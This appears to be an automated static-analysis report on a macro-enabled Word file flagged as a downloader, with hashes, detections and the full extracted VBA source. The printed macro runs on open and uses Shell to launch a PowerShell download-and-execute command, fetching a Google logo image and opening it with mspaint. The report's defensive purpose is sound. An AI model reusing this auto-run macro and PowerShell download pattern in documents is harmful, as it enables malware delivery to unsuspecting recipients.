Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c68aca7e1ad45514…

MALICIOUS

Office (OOXML)

14.4 KB Created: 2021-06-05 09:52:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2021-06-20
MD5: 7969685ecb44e507b10794acd4a51eed SHA-1: 6f0b0b59a70dd8139e4689fd1f58270c257c29ae SHA-256: c68aca7e1ad45514a4b1287ed005ef2c714d62cec9f2fb32ddb7a7245beb5762
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA macro with an AutoOpen function. This macro uses Shell() to execute a PowerShell command that downloads a file named 'a.png' from a Google-hosted URL and then attempts to execute it. The VBA code also constructs and executes 'mspaint a.png', likely to run the downloaded payload. The presence of the AutoOpen macro and the PowerShell execution strongly indicate a malicious downloader.

Heuristics 7

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            E = "powershell.exe ""IEX ((new-object net.webclient).downloadfile('https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png', 'a.png'))"""
        Shell (E)
        MsgBox "ABC"
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            Dim exec As String
        E = "powershell.exe ""IEX ((new-object net.webclient).downloadfile('https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png', 'a.png'))"""
        Shell (E)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub aUtoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.pngIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 917 bytes
SHA-256: 4467a583984a3ae899b68b8dd5af12e86945dd764445c4a87025471fae2436b9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"






Sub aUtoOpen()


    
    Dim answer As Integer
 
    answer = MsgBox("Text", vbQuestion + vbYesNo + vbDefaultButton2, "Message Box Title")
    
    
    If answer = vbYes Then
        Dim s As String
        Dim exec As String
        E = "powershell.exe ""IEX ((new-object net.webclient).downloadfile('https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png', 'a.png'))"""
        Shell (E)
        MsgBox "ABC"
        r = "ms" & "p" & "a" & "i" & "n" & "t" & " " & "a" & "." & "p" & "ng"
        Shell (r)
    End If
    


End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: 5d29cd572cd220d1dc9cb874d6a8b545e4760801b3c9ab36dae5fd40b5795db7
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.